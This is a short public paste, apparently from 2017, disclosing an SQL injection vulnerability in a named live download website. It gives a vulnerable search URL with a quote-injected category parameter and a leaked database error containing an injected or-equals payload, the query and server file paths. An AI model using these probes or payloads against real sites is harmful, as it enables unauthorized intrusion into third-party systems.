Advertisement
Guest User

SQL vulnerability

a guest
Feb 27th, 2017
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.02 KB | None | 0 0
  1. SQL injection vulnerability in downloadcrew.com
  2. Errors are put as comments in the HTML
  3.  
  4. Example of vulnerable pages:
  5. http://downloadcrew.com/?act=search&cat='30
  6.  
  7.  
  8. <!--
  9. PDOException - SQLSTATE[22P02]: Invalid text representation: 7 ERROR: invalid input syntax for integer: &quot;&quot; or &quot;&quot; = &quot;&quot;<p>SELECT * FROM categories WHERE id = :id<br />
  10. Array<br />
  11. (<br />
  12. )<br />
  13.  
  14.  
  15. Stack trace:
  16. #0 /home/n/q/nqdownloadcrew/web/public_html/classes/class.db.connection.php(123): PDOStatement-&gt;execute()<br />
  17. #1 /home/n/q/nqdownloadcrew/web/public_html/classes/views/view.php(117): DBStatement-&gt;execute()<br />
  18. #2 /home/n/q/nqdownloadcrew/web/public_html/classes/views/category.php(47): View-&gt;LoadByStmt(Object(DBStatement))<br />
  19. #3 /home/n/q/nqdownloadcrew/web/public_html/actions/search.php(73): ViewCategory::LoadByID(Object(DBConnection), '&quot; or &quot;&quot; = &quot;')<br />
  20. #4 /home/n/q/nqdownloadcrew/web/public_html/index.php(115): require('/home/n/q/nqdow...')<br />
  21. #5 {main}
  22. -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement